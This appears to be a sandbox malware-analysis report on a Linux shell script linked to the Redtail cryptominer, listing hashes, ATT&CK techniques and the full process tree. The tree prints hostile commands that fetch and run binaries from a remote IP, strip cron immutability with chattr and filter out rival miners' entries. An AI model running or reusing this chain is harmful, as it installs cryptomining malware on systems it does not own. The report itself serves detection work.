aed29398112ad074b8fd8a2e25020fb01db1f8cdaff86326222529dbeba5746b

Analysis

max time kernel
38s
max time network
39s
platform
debian-9_mips
resource
debian9-mipsbe-20240729-en
resource tags

arch:mipsimage:debian9-mipsbe-20240729-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem
submitted
24-11-2024 07:02

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

sh.sh
Size

1KB
MD5

5a86127d998b5c3496802959ac0a3d11
SHA1

21d05b5a016cdd8245e24778e479bf6330867c3f
SHA256

aed29398112ad074b8fd8a2e25020fb01db1f8cdaff86326222529dbeba5746b
SHA512

3270ff6b4bb0dde62180e605a7fc114497df627c8cb5cb4865040e9d287123a4b4855d4e6e386757e9bba0b57f1ef02fb1d81204bfc83612ac87a109962b6e98

Score

7^/10

defense_evasion discovery upx

Malware Config

Signatures

File and Directory Permissions Modification 1 TTPs 5 IoCs
Adversaries may modify file or directory permissions to evade defenses.
defense_evasion

Linux and Mac File and Directory Permissions Modification
T1222.002

Processes:

chmodchmodchmodchmodchmod

pid process

776 chmod
874 chmod
883 chmod
889 chmod
895 chmod
Executes dropped EXE 4 IoCs

Processes:

.redtail.redtail.redtail.redtail

ioc pid process

/.redtail 875 .redtail
/.redtail 884 .redtail
/.redtail 890 .redtail
/.redtail 896 .redtail

pid	process
776	chmod
874	chmod
883	chmod
889	chmod
895	chmod

ioc	pid	process
/.redtail	875	.redtail
/.redtail	884	.redtail
/.redtail	890	.redtail
/.redtail	896	.redtail

Attempts to change immutable files 22 IoCs

Modifies inode attributes on the filesystem to allow changing of immutable files.

Processes:

grepchattrgrepgrepchattrgrepgrepchattrchattrchattrchattrchattrchattrchattrchattrgrepchattrgrepgrepchattrchattrchattr

pid	process
793	grep
801	chattr
807	grep
824	grep
784	chattr
798	grep
816	grep
792	chattr
789	chattr
797	chattr
805	chattr
810	chattr
819	chattr
821	chattr
822	chattr
786	grep
791	chattr
802	grep
811	grep
815	chattr
823	chattr
785	chattr

UPX packed file 4 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
/x86_64	upx
/i686	upx
/aarch64	upx
/arm7	upx

Enumerates kernel/hardware configuration 1 TTPs 2 IoCs
Reads contents of /sys virtual filesystem to enumerate system information.
discovery

System Information Discovery
T1082

Processes:

systemctlsystemctl

description ioc process

File opened for reading /sys/fs/kdbus/0-system/bus systemctl
File opened for reading /sys/fs/kdbus/0-system/bus systemctl

description	ioc	process
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl

Reads runtime system information 19 IoCs

Reads data from /proc virtual filesystem.

discovery

Processes:

systemctlmvmvfindsystemctlmvmvmvcatawkmvmvmv

description	ioc	process
File opened for reading	/proc/filesystems	systemctl
File opened for reading	/proc/1/environ	systemctl
File opened for reading	/proc/filesystems	mv
File opened for reading	/proc/filesystems	mv
File opened for reading	/proc/filesystems	find
File opened for reading	/proc/self/stat	systemctl
File opened for reading	/proc/1/environ	systemctl
File opened for reading	/proc/cmdline	systemctl
File opened for reading	/proc/filesystems	mv
File opened for reading	/proc/filesystems	mv
File opened for reading	/proc/filesystems	mv
File opened for reading	/proc/mounts	cat
File opened for reading	/proc/self/maps	awk
File opened for reading	/proc/self/stat	systemctl
File opened for reading	/proc/cmdline	systemctl
File opened for reading	/proc/filesystems	mv
File opened for reading	/proc/filesystems	mv
File opened for reading	/proc/filesystems	systemctl
File opened for reading	/proc/filesystems	mv

Writes file to tmp directory 1 IoCs
Malware often drops required files in the /tmp directory.

Processes:

sh

description ioc process

File opened for modification /tmp/clean_crontab sh

description	ioc	process
File opened for modification	/tmp/clean_crontab	sh

/tmp/sh.sh
/tmp/sh.sh
1⤵
PID:730
- /bin/grep
  grep noexec
  2⤵
  PID:736
- /bin/cat
  cat /proc/mounts
  2⤵
  - Reads runtime system information
  PID:735
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  - Reads runtime system information
  PID:737
- /usr/bin/whoami
  whoami
  2⤵
  PID:748
- /usr/bin/find
  find / -type d -user root -perm "-u=rwx" -not -path "/tmp/*" -not -path "/proc/*" -not -path /sys -not -path "/sys/*" -not -path /proc -not -path "/proc/*" -not -path /dev/pts -not -path "/dev/pts/*" -not -path /run -not -path "/run/*" -not -path /sys/kernel/security -not -path "/sys/kernel/security/*" -not -path /run/lock -not -path "/run/lock/*" -not -path /sys/fs/cgroup -not -path "/sys/fs/cgroup/*" -not -path /sys/fs/cgroup/systemd -not -path "/sys/fs/cgroup/systemd/*" -not -path "/sys/fs/cgroup/net_cls,net_prio" -not -path "/sys/fs/cgroup/net_cls,net_prio/*" -not -path /sys/fs/cgroup/blkio -not -path "/sys/fs/cgroup/blkio/*" -not -path /sys/fs/cgroup/freezer -not -path "/sys/fs/cgroup/freezer/*" -not -path "/sys/fs/cgroup/cpu,cpuacct" -not -path "/sys/fs/cgroup/cpu,cpuacct/*" -not -path /sys/fs/cgroup/devices -not -path "/sys/fs/cgroup/devices/*" -not -path /sys/fs/cgroup/cpuset -not -path "/sys/fs/cgroup/cpuset/*" -not -path /sys/fs/cgroup/memory -not -path "/sys/fs/cgroup/memory/*" -not -path /sys/fs/cgroup/pids -not -path "/sys/fs/cgroup/pids/*" -not -path /sys/fs/cgroup/perf_event -not -path "/sys/fs/cgroup/perf_event/*"
  2⤵
  - Reads runtime system information
  PID:751
- /bin/uname
  uname -mp
  2⤵
  PID:770
- /usr/bin/touch
  touch .testfile
  2⤵
  PID:771
- /bin/dd
  dd "if=/dev/zero" "of=.testfile2" "bs=2M" "count=1"
  2⤵
  PID:773
- /bin/rm
  rm -rf .testfile .testfile2
  2⤵
  PID:774
- /usr/bin/wget
  wget http://45.202.35.190/clean
  2⤵
  PID:775
- /bin/chmod
  chmod +x clean
  2⤵
  - File and Directory Permissions Modification
  PID:776
- /bin/sh
  sh clean
  2⤵
  - Writes file to tmp directory
  PID:778
- - /bin/systemctl
    systemctl disable c3pool_miner
    3⤵
    - Enumerates kernel/hardware configuration
    - Reads runtime system information
    PID:780
- - /bin/systemctl
    systemctl stop c3pool_miner
    3⤵
    - Enumerates kernel/hardware configuration
    - Reads runtime system information
    PID:781
- - /usr/bin/chattr
    chattr -ia /var/spool/cron/crontabs
    3⤵
    - Attempts to change immutable files
    PID:784
- - /usr/bin/chattr
    chattr -ia /etc/crontab
    3⤵
    - Attempts to change immutable files
    PID:785
- - /bin/grep
    grep -vE "wget|curl|/dev/tcp|/tmp|\\.sh|nc|bash -i|sh -i|base64 -d" /etc/crontab
    3⤵
    - Attempts to change immutable files
    PID:786
- - /bin/mv
    mv /tmp/clean_crontab /etc/crontab
    3⤵
    - Reads runtime system information
    PID:788
- - /usr/bin/chattr
    chattr -ia /etc/cron.hourly
    3⤵
    - Attempts to change immutable files
    PID:789
- - /usr/bin/chattr
    chattr -ia /etc/cron.daily
    3⤵
    - Attempts to change immutable files
    PID:791
- - /usr/bin/chattr
    chattr -ia /etc/cron.daily/apt-compat
    3⤵
    - Attempts to change immutable files
    PID:792
- - /bin/grep
    grep -vE "wget|curl|/dev/tcp|/tmp|\\.sh|nc|bash -i|sh -i|base64 -d" /etc/cron.daily/apt-compat
    3⤵
    - Attempts to change immutable files
    PID:793
- - /bin/mv
    mv /tmp/clean_crontab /etc/cron.daily/apt-compat
    3⤵
    - Reads runtime system information
    PID:795
- - /usr/bin/chattr
    chattr -ia /etc/cron.daily/bsdmainutils
    3⤵
    - Attempts to change immutable files
    PID:797
- - /bin/grep
    grep -vE "wget|curl|/dev/tcp|/tmp|\\.sh|nc|bash -i|sh -i|base64 -d" /etc/cron.daily/bsdmainutils
    3⤵
    - Attempts to change immutable files
    PID:798
- - /bin/mv
    mv /tmp/clean_crontab /etc/cron.daily/bsdmainutils
    3⤵
    - Reads runtime system information
    PID:799
- - /usr/bin/chattr
    chattr -ia /etc/cron.daily/dpkg
    3⤵
    - Attempts to change immutable files
    PID:801
- - /bin/grep
    grep -vE "wget|curl|/dev/tcp|/tmp|\\.sh|nc|bash -i|sh -i|base64 -d" /etc/cron.daily/dpkg
    3⤵
    - Attempts to change immutable files
    PID:802
- - /bin/mv
    mv /tmp/clean_crontab /etc/cron.daily/dpkg
    3⤵
    - Reads runtime system information
    PID:804
- - /usr/bin/chattr
    chattr -ia /etc/cron.daily/exim4-base
    3⤵
    - Attempts to change immutable files
    PID:805
- - /bin/grep
    grep -vE "wget|curl|/dev/tcp|/tmp|\\.sh|nc|bash -i|sh -i|base64 -d" /etc/cron.daily/exim4-base
    3⤵
    - Attempts to change immutable files
    PID:807
- - /bin/mv
    mv /tmp/clean_crontab /etc/cron.daily/exim4-base
    3⤵
    - Reads runtime system information
    PID:809
- - /usr/bin/chattr
    chattr -ia /etc/cron.daily/logrotate
    3⤵
    - Attempts to change immutable files
    PID:810
- - /bin/grep
    grep -vE "wget|curl|/dev/tcp|/tmp|\\.sh|nc|bash -i|sh -i|base64 -d" /etc/cron.daily/logrotate
    3⤵
    - Attempts to change immutable files
    PID:811
- - /bin/mv
    mv /tmp/clean_crontab /etc/cron.daily/logrotate
    3⤵
    - Reads runtime system information
    PID:813
- - /usr/bin/chattr
    chattr -ia /etc/cron.daily/passwd
    3⤵
    - Attempts to change immutable files
    PID:815
- - /bin/grep
    grep -vE "wget|curl|/dev/tcp|/tmp|\\.sh|nc|bash -i|sh -i|base64 -d" /etc/cron.daily/passwd
    3⤵
    - Attempts to change immutable files
    PID:816
- - /bin/mv
    mv /tmp/clean_crontab /etc/cron.daily/passwd
    3⤵
    - Reads runtime system information
    PID:817
- - /usr/bin/chattr
    chattr -ia /etc/cron.weekly
    3⤵
    - Attempts to change immutable files
    PID:819
- - /usr/bin/chattr
    chattr -ia /etc/cron.monthly
    3⤵
    - Attempts to change immutable files
    PID:821
- - /usr/bin/chattr
    chattr -ia /etc/cron.d
    3⤵
    - Attempts to change immutable files
    PID:822
- - /usr/bin/chattr
    chattr -ia /etc/anacrontab
    3⤵
    - Attempts to change immutable files
    PID:823
- - /bin/grep
    grep -vE "wget|curl|/dev/tcp|/tmp|\\.sh|nc|bash -i|sh -i|base64 -d" /etc/anacrontab
    3⤵
    - Attempts to change immutable files
    PID:824
- - /bin/mv
    mv /tmp/clean_crontab /etc/anacrontab
    3⤵
    - Reads runtime system information
    PID:826
- - /bin/rm
    rm -rf /tmp/sh.sh /tmp/systemd-private-94dbc7448e0a4c68984d42fc8a1299f5-systemd-timedated.service-PFX2SO
    3⤵
    PID:828
- - /bin/rm
    rm -rf /var/tmp/systemd-private-94dbc7448e0a4c68984d42fc8a1299f5-systemd-timedated.service-QcIFLg
    3⤵
    PID:829
- - /bin/rm
    rm -rf "/dev/shm/*"
    3⤵
    PID:830
- /bin/rm
  rm -rf clean
  2⤵
  PID:832
- /bin/rm
  rm -rf .redtail
  2⤵
  PID:833
- /bin/grep
  grep -q x86_64
  2⤵
  PID:836
- /bin/grep
  grep -q amd64
  2⤵
  PID:838
- /bin/grep
  grep -q "i[3456]86"
  2⤵
  PID:840
- /bin/grep
  grep -q armv8
  2⤵
  PID:843
- /bin/grep
  grep -q aarch64
  2⤵
  PID:846
- /bin/grep
  grep -q armv7
  2⤵
  PID:848
- /usr/bin/wget
  wget http://45.202.35.190/x86_64
  2⤵
  PID:850
- /bin/cat
  cat x86_64
  2⤵
  PID:872
- /bin/chmod
  chmod +x .redtail
  2⤵
  - File and Directory Permissions Modification
  PID:874
- /.redtail
  ./.redtail
  2⤵
  - Executes dropped EXE
  PID:875
- /bin/rm
  rm -rf x86_64
  2⤵
  PID:878
- /usr/bin/wget
  wget http://45.202.35.190/i686
  2⤵
  PID:879
- /bin/cat
  cat i686
  2⤵
  PID:882
- /bin/chmod
  chmod +x .redtail
  2⤵
  - File and Directory Permissions Modification
  PID:883
- /.redtail
  ./.redtail
  2⤵
  - Executes dropped EXE
  PID:884
- /bin/rm
  rm -rf i686
  2⤵
  PID:886
- /usr/bin/wget
  wget http://45.202.35.190/aarch64
  2⤵
  PID:887
- /bin/cat
  cat aarch64
  2⤵
  PID:888
- /bin/chmod
  chmod +x .redtail
  2⤵
  - File and Directory Permissions Modification
  PID:889
- /.redtail
  ./.redtail
  2⤵
  - Executes dropped EXE
  PID:890
- /bin/rm
  rm -rf aarch64
  2⤵
  PID:892
- /usr/bin/wget
  wget http://45.202.35.190/arm7
  2⤵
  PID:893
- /bin/cat
  cat arm7
  2⤵
  PID:894
- /bin/chmod
  chmod +x .redtail
  2⤵
  - File and Directory Permissions Modification
  PID:895
- /.redtail
  ./.redtail
  2⤵
  - Executes dropped EXE
  PID:896
- /bin/rm
  rm -rf arm7
  2⤵
  PID:898

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/.testfile2

Filesize
2.0MB

MD5
b2d1236c286a3c0704224fe4105eca49

SHA1
7d76d48d64d7ac5411d714a4bb83f37e3e5b8df6

SHA256
5647f05ec18958947d32874eeb788fa396a05d0bab7c1b71f112ceb7e9b31eee

SHA512
731859029215873fdac1c9f2f8bd25a334abf0f3a9e1b057cf2cacc2826d86b0c26a3fa920a936421401c0471f38857cb53ba905489ea46b185209fdff65b3b6

Download Submit
/aarch64

Filesize
1.3MB

MD5
322095f828345179dc422bcf65db4b61

SHA1
c244dce124772e0d94a01b3bc0d5d005614101b2

SHA256
992cb5a753697ee2642aa390f09326fcdb7fd59119053d6b1bdd35d47e62f472

SHA512
c8da61b2ee95cae3eb62d4985be6eeee41976fa0a69e0c738353e7e179454e8872d52152ca6df54949a6c6dd42f48b0981593c1f4f973e9e1e176ba4ca978f70

Download Submit
/arm7

Filesize
1.1MB

MD5
045daa66263bfd467051c013e9222faf

SHA1
4b943b14526d7bf7be2b3e3f9af24d1f35015548

SHA256
d4635f0f5ab84af5e5194453dbf60eaebf6ec47d3675cb5044e5746fb48bd4b4

SHA512
bd684e0909793c05a34891f2ffe289e00b66c634d8059a9301274ef764aff38ae6d5c0c224228d11007b297e32e00749b40197f77f7fc48c44c50ef3651bc41f

Download Submit
/clean

Filesize
795B

MD5
397ff5e54194072e6d8a44a0d8cc1b27

SHA1
42477b0c3b277b5e907b0a35c644f3291ed30a63

SHA256
d46555af1173d22f07c37ef9c1e0e74fd68db022f2b6fb3ab5388d2c5bc6a98e

SHA512
ff40c129e3b2891ae280bce97e52ee69aea18ca60ea7901f7efd4cf11d3bf1c4ee48e9eb90e5f045e080ab784ee2a9942c2bcf0a531b7f4602931f63c4b32d74

Download Submit
/i686

Filesize
1.5MB

MD5
01fc359f540fca7f496b5c4841c67f7e

SHA1
4689b4afff6f08b8c9e781d07c3a782823a6689f

SHA256
69dc9dd8065692ea262850b617c621e6c1361e9095a90b653b26e3901597f586

SHA512
4d7170159ec6a651cd7b8e64ab06aa76f3bb691be70d219a7dbc1116a383f43226ec6815ae51fe23b25c9450f142cba0ba71ce659dae9ca376e97f126e81a4fc

Download Submit
/tmp/clean_crontab

Filesize
1KB

MD5
30e858769aacd9cc309502f8d5c6aa0f

SHA1
927c06dd4d6cbb5ca02e9505011c8667c47f2d6e

SHA256
eff406c0943e1399e3e15fdb6ca2893a187d6b273f5bd9d17eec4e4b4c52b8cd

SHA512
f7f6e70925afe54fc2fdaae13a750b3c49fde9fa59d80af321885d270112ebb2291f034037708f1ba8515f3e3e1ca0a493cd1e002895aa699c469e0365ccde3c

Download Submit
/tmp/clean_crontab

Filesize
3KB

MD5
02f33c9e59b27bcd241e488cd48de072

SHA1
9247eee9b2310d56455beccf41c577ba16b78e3d

SHA256
2565ab0cb86a8cb7fd37a0401ad22624da886b8df9130a5bd4b566f404130c14

SHA512
1eda274264320a72cd58462b6c8a7747990a7eedf836be730b51b92ea6b04a1005aed596f9b9d53c4c8a93001d112450d0c6d83dfe4eee4b91a671623662fb3d

Download Submit
/tmp/clean_crontab

Filesize
249B

MD5
db990990933b6f56322725223f13c2bc

SHA1
387303696a796e27f559c73679e979f2a538072d

SHA256
777a9112ee093d8683645b031eb6cfeb9ce77274f40575c48ff2054ea24114d1

SHA512
a3764e580bcfe0b2100da8ff2a00bed4936cb2acc9985daef52fb0310a7ed3367a1944a355c3f1dbc92d82c82b54280926736f81bc138efb4f7df1814abee3b5

Download Submit
/tmp/clean_crontab

Filesize
722B

MD5
8f111d100ea459f68d333d63a8ef2205

SHA1
077ca9c46a964de67c0f7765745d5c6f9e2065c3

SHA256
0e5c204385b21e15b031c83f37212bf5a4ee77b51762b7b54bd6ad973ebdf354

SHA512
d81767b47fb84aaf435f930356ded574ee9825ec710a2e7c26074860d8a385741d65572740137b6f9686c285a32e2951ca933393b266746988f1737aad059adb

Download Submit
/tmp/clean_crontab

Filesize
1KB

MD5
bc4a71cbcaeed4179f25d798257fa980

SHA1
61445721d0b5d86ac0a8386a4ceef450118f4fbb

SHA256
8eeae3a9df22621d51062e4dadfc5c63b49732b38a37b5d4e52c99c2237e5767

SHA512
709badb4dd1a15a10b34f82d31ed4bbab81698190d2ec94e2ad3dcdc90d97b893eb61cde72f08e517a8beea08ec1d675385fd42a9e77530981b7d83c6bd3548c

Download Submit
/tmp/clean_crontab

Filesize
279B

MD5
911a774fe040993b929504f3d9415ab3

SHA1
55ccc8e95097f005abf9f4d91a14394e6d0f5da5

SHA256
340dfc483eb79b83b0630b1c0b339e30ebd724ef2f58bb87ba92946472e8e63d

SHA512
1eb8fd8dc6fd444ba2fa3ca7e863894cfb19383e5b20c700ed24aa615402340424d093a761632cf27a3e789ecd548ca972806e154161635da4f97b415d6fc64f

Download Submit
/x86_64

Filesize
1.6MB

MD5
f6634e2fb7872be767a2cb5b1da04103

SHA1
532037729f2da9fc1341f744e5afa2420bcfebca

SHA256
29f8524562c2436f42019e0fc473bd88584234c57979c7375c1ace3648784e4b

SHA512
e1b34b5235ecfe8f74698d10ecf70758adcb5ef2832b3be272fe737770f47daf4974fe6c957ccf24282a1a0af4a4cca393727517ea5ade97504a55b3b6a6ff51

Download Submit